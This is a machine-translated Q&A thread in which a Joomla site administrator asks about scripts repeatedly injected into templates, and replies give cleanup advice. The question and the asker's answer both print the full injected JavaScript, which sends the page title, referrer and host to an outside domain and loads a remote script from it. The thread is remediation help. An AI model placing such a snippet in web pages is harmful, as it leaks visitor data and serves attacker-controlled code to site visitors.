1. 首页
  2. 问答
  3. 脚本注入的Joomla模板

脚本注入的Joomla模板

2016-01-12 30 views
1

我以前管理大量的Joomla网站的,和几个月,在所有这些,开始出现一些非常strage脚本...脚本注入的Joomla模板

赞一个以上:

所以我删除所有的人工,但他们不断出现再次:(

有人能帮助理解发生了什么?我应该编辑一些文件,以防止happend?

非常感谢!

var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}

来源

2016-01-12 Diogo Wernik

+0

你可能会给这个看看。 [链接](http://stackoverflow.com/questions/34720405/joomla-site-hacked/34733454#34733454) –

回答

0

所以,它有点复杂!但我发现,我的服务器被黑客入侵

服务器结构,我有:

joomlasite (folder 1) 
otherjoomlasite (folder2) 
bigjoomlasite (folder3) 
(...) 
php.ini

所以在文件夹中的public_html我发现许多像很奇怪的文件!

public_html 
joomlasite 
joomlasite.com (hacked issue - so i deleted this folder) 
|____ css (lots of strange files *.php) 
|____ sylink (lots of strange files *.php) 
otherjoomlasite 
otherjoomlasite.org 
|____ css (lots of strange files *.php) 
|____ sylink (lots of strange files *.php) 
bigjoomlasite (folder3) 
bigjoomlasite.io 
|____ css (lots of strange files *.php) 
|____ sylink (lots of strange files *.php) 
alias.php (strange file) 
article.php (strange file) 
css.php (strange file)

所以我删除了所有奇怪的文件,joomla文件夹哪里好,我没有找到奇怪的文件呢!

做了所有安全更改,密码等...

而在所有的Joomla模板删除:

var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}

看起来像全没了稳定的现在:)

感谢答案和sugestions ...

来源

2016-01-15 14:59:54

+0

你发现这是怎么发生的?我正在寻找一种方法来保护我的网站免受这些攻击。我们已经被黑客攻击了很多次,所以我想这不是最后一次有人试图用这些黑客攻击你的网站 – Shide

+1

嗨@Shide,我没有发现这是怎么发生的,但做了一些行动,有助于预防,但并非易事,因为我到目前为止没有问题,不知道未来是否会有这样的问题。我使用的是共享主机,因此我更改为数字海洋上的vpn机器,开始使用nginx反向代理作为服务器,并在nginx配置文件上使用了一些脚本来防止攻击。如果你想可以放在这里与脚本文件的链接或提供更多的信息;) –

+0

非常感谢!但我们的托管服务提供商并没有真正允许我们进入服务器深层配置。实际上我现在厌倦了joomla,所以我只是想用AWS/nginx/NodeJS开发一个新网站,那样会很好。谢谢你的评论 ! – Shide

2

如果脚本出现在您的模板中,我假设您已被黑客入侵。尝试在所有文件内容第一次发生之前恢复所有文件内容,并重置所有密码。然后升级到最新的joomla版本,以防止黑客入侵。

如果您不确定何时发生了攻击,因此无法回滚到以前的版本,请将所有代码替换为新下载的代码(Joomla核心,下载的组件等)。检查图像文件夹来检查它只包含图像(没有PHP脚本或其他可疑的文件)。如果你有自定义代码,查看这个来检查没有任何东西被注入。再次重置所有密码(ftp,用户密码,db密码等)。那么你会没事的。

来源

2016-01-12 23:21:37 jonasfh

相关问题

 相关问题